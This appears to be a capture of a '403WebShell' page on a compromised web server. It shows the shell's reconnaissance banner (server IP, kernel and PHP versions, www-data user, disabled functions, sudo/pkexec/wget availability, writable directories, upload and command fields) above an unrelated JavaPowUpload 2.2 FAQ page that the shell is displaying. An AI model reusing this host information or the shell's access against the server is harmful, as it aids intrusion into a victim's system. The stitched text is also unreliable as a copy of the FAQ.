????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/login/JavaPowUpload/Documentation/JavaPowUpload_Manual_HTML/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.notes-online.se/login/JavaPowUpload/Documentation/JavaPowUpload_Manual_HTML/HowTo.html
<!-- saved from url=(0014)about:internet -->

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>How to</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<script src="content.js" language="javascript" type="text/javascript"></script>
<style type="text/css">
<!--
.style5 {	font-family: "Courier New", Courier, monospace;
	font-size: 100%;
}
-->
</style>
</head>

<body>
<table width="100%" cellpadding="0" cellspacing="0">
        <tr>
            <td width="400">

                <span class="caption">JavaPowUpload </span><span class="yellow">2.2</span>
                <br />
                <span class="gray">FAQ</span>
            </td>
            <td>&nbsp;
                
            </td>
            <td align="char" width="200">

                <img src="world.jpg" align="middle" hspace="5" /><b><a target="_blank" href="http://www.element-it.com/multiple-file-upload-applet/java-uploader.aspx">Home
                    page</a></b><br />
                <img src="email.jpg" align="middle" hspace="5" /><b><a target="_blank" href="http://www.element-it.com/contacts.aspx">Contact
                    support</a></b>
            </td>
        </tr>
</table>

 <p class="topic"> JavaPowUpload Frequently Asked Questions (FAQ) </p>
 <p>This section describes how to use JavaPowUpload applet and answers on Frequently Asked Questions. </p>
<p><a href="#wrongDomain">1. JavaPowUpload displays the "This copy of JavaPowUpload software registered to another domain..." message. What should I do?</a></p>
<p><a href="#register">2. How to register JavaPowUpload?</a></p>
<p><a href="#hideserial">3. How to hide my SerialNumber on web page?</a></p>
<p><a href="#redirect">4. How to redirect a user to another page when upload/download process is complete?</a></p>
<p><a href="#result">5. How to send information about upload/download process results to a server?</a></p>
<p><a href="#custominfo">6. How to send additional information to a server?</a></p>
<!--<p><a href="#load">7. how to reduce the loading time?</a></p>-->
<p>&nbsp;</p>
<p>&nbsp;</p>

<p class="topicLeft" id="wrongDomain" name="wrongDomain">1. JavaPowUpload displays "This copy of JavaPowUpload software registered to another domain..." message . What should I  do?</p>
<blockquote>
  <p>
  Unfortunately, the client-side controls like Java applet are defenseless from page source view and copying.<br /> So starting version 2.0 JavaPowUpload includes domain name hash at the serial key.<br />
  You should enter your domain name during the purchase.<br />
If you have a single domain license and has changed your domain, you should buy another license or pay domain change fee at the <a target="_blank" href=" http://www.element-it.com/purchase.aspx"> purchase page</a> or upgrade single domain license to the enterprise (unlimited domains) at the <a target="_blank" href=" http://www.element-it.com/upgrade.aspx">upgrade page</a>.<br />
You can use JavaPowUpload on the tesing site/server for free. Just close the alert window after when it occures or remove serial number from parameters to make JavaPowUpload work as trial.</p>
</blockquote>

 <p class="topicLeft" id="includeApplet" name="includeApplet">2. How to register JavaPowUpload</p>
 <blockquote>
  <p>You can make JavaPowUpload trial to work as full by setting <a href="Parameters_function_common.html#Common.SerialNumber">Common.SerialNumber</a> parameter.
</blockquote>
 <p class="topicLeft" id="hideserial" name="hideserial">3. How to hide my SerialNumber on web page?</p>
 <blockquote>
  <p>If you set   <a href="Parameters_function_common.html#Common.SerialNumber">Common.SerialNumber</a> property on web page inside the &lt;applet&gt; tag , anyone can  view html source code and get your SerialNumber. We understand this situation  and recommend you to place SerialNumber in external xml file with properties.
&nbsp;Specify URL to this file by Common.PropertiesFile  property. <br />
Set some filters on web server which allow  to access this xml file only if it is requested by JAVA (for example, filter by  user-agent header).<br/>
Starting from version 2.0 domain license will work only on the domain specified while purchase.
</blockquote>
 <p class="topicLeft" id="redirect" name="redirect">4. How to redirect a user to another page when upload/download process is complete?</p>
 <blockquote>
  <p>Specify the   <a href="Parameters_function_common.html#Common.FinishUrl">Common.FinishUrl</a> property to url of the page which should be loaded when  upload/download process is complete.  <br/>
  JavaPowUpload does not post any  information to this page. You may also configure a target where this page  should be loaded using the <a href="Parameters_function_common.html#Common.FinishUrl.Target"> Common.FinishUrl.Target</a> property (&quot;_self&quot;  by default).
</blockquote>
 <p class="topicLeft" id="result" name="result">5. How to send information about upload/download process results to a server?</p>
<blockquote>
  <p>JavaPowUpload  can post information about download/upload process results to a server when  upload/download process is complete.<br />
Specify the   <a href="Parameters_function_common.html#Common.ResultUrl">Common.ResultUrl</a> property - URL to a necessary web page.
This URL will be loaded by  JavaPowUpload but not by a browser.<br />
JavaPowUpload sends the following  info about each file:
  <ul>
<li>Name of the destination folder (only in download  mode)<br />
</li>
<li> File path. In download mode, the value is a file  download url, in upload mode - full file path.<br />
</li><li>File status.
</li>
</ul>
</blockquote>
 <p class="topicLeft" id="custominfo" name="custominfo">6. How to send additional information to a server?</p>
 <blockquote>
  You can  send additional information in several ways:<br />
  <ul>
 <li>
a. Add info  to Upload.UploadUrl property.<br />
For example: <br />
<code>&lt;param  name=&quot;Upload.UploadUrl&quot;  value=&quot;uploadfiles.php?paramname1=value1&amp;paramname2=value2&quot;&gt;
</code>
</li><li>
  b. Specify  Upload.HttpUpload.FormName property.<br />
In this case you can add a form to your  html page and JavaPowUpload will automatically add form values to the HTTP request.<br />
<br />
</li><li>
    c. Specify  Upload.HttpUpload.CustomPostFields property.<br />
Array of custom fields and values that  will be added to the request separated by ; <br />
Example: <br />
<code>filedName1=value1;FieldName2=value2
</code>
</li><li>
  d. Use  JavaScript addPostField(String name, String value) method.<br />
It adds &ldquo;name&ndash;value&rdquo; pair to the  list that will be sent as text Form items. Actually this method appends  &quot;name=value&quot; string in the end of Upload.HttpUpload.CustomPostFields property.
  <p>Example:<br />
<code>JavaPowUpload.addPostField(&quot;Username&quot;,&quot;JDoe&quot;);
</code>
</p>
</li>
</ul>

</blockquote>

<!--<p class="topicLeft" id="load" name="load">7. How to reduce the loading time?</p>
 <blockquote>
   First of all, by default Java environment configured to cache jar files, therefore jar files will be downloaded from server only once - when it loaded at first time.
   Next time when user opan page with applet, jar files will be loaded from cache.
   But it is possible to reduce first time loading process. 
     Starting from 2.2 version javaPowUpload distribution package contain also packed version of jar files (pack.gz files in lib folder). 
     Starting from Java SE 6 update 10 it is possible to enable loading of packed files which are up to 3 times less in size than jar files. 
     <p>Pass the &quot;-Djnlp.packEnabled&quot; VM argument by using  &quot;java_arguments&quot; parameter , i.e.:</p>
     <pre>			
	 	&lt;APPLET&gt; 
	    	&lt;PARAM NAME=&quot;java_arguments&quot; VALUE=&quot;-Djnlp.packEnabled=true&quot;/&gt;
		&lt;/APPLET&gt;</pre>
	  If you use deployJava.js script:
	  <pre> var parameters = <br />	{<br />		&quot;java_arguments&quot; :&quot;-Djnlp.packEnabled=true&quot;,				<br />		&quot;Common.SerialNumber&quot; : &quot;put your serial number here&quot;,  <br />		&quot;Common.UploadMode&quot; : &quot;true&quot;,			<br />		&quot;Common.UseLiveConnect&quot; : &quot;true&quot;<br />	};	<br />	<br />	deployJava.runApplet(attributes, parameters, &quot;1.5.1&quot;);</pre>
 </blockquote>
 -->

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit